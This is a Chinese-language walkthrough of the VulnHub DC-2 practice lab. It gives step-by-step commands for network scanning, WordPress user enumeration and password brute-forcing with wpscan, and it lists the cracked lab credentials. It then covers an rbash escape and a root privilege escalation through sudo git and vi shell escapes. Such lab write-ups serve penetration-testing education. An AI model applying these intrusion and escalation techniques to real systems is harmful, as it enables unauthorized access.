DC2
下载地址:
https://download.vulnhub.com/dc/DC-2.zip
题目要求:
Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
As with the original DC-1, it's designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag.
And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts, is the final flag.
For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.
I haven't explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.
信息收集
1.1 arp-scan -l
1.2 nmap -p- -sV -T5 192.168.126.132
1.3 whatweb 192.168.126.132
修改host
1.4 80端口301状态码永久重定向,修改本地host文件后访问
1.5 再次访问得知是WordPress
1.6 找到第一个flag
cewl获取密码字典
2.1 提示要求登录后台,换用户,可能需要用到cewl
用cewl爬取密码字典
cewl http://dc-2/ -w passwd.txt
2.2 WordPress后台地址
获取用户名
2.3 ?author=1的方法手动遍历用户
1和3回显2个用户
dc-2/?author=1
dc-2/?author=3
2.4 用wpscan检测到3个用户
wpscan --url http://dc-2/ -e u
echo "" > usr.txt
爆破
2.5 wpscan爆破
wpscan --url http://dc-2/ -U usr.txt -P passwd.txt
jerry/adipiscing
tom/parturient
2.6 jerry/adipiscing登录后台,发现flag2
提示WordPress上没有渗透点了,换条路
ssh还没尝试
3.1 ssh [email protected] -p 7744
3.2 ls
cat flag3.txt
发现受到rbash限制
rbash绕过
3.3 rbash绕过
BASH_CMDS[a]=/bin/sh;a#
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
3.4 提到了jerry,su切换到jerry中
su jerry
adipiscing
cd /home/jerry
ls
3.5 cat flag4.txt
flag4提示git
git提权
4.1 git提权
sudo -l
git提权
sudo git help config
!/bin/bash
4.2 提权成功
cd /root
cat final-flag.txt
4.3 得到最后一个flag
补漏
查看可用命令
compgen -c
flag3内容
poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
vi部分提权
vi flag3.txt
:set shell=/bin/sh+回车
:shell+回车
切换到jerry,发现flag4
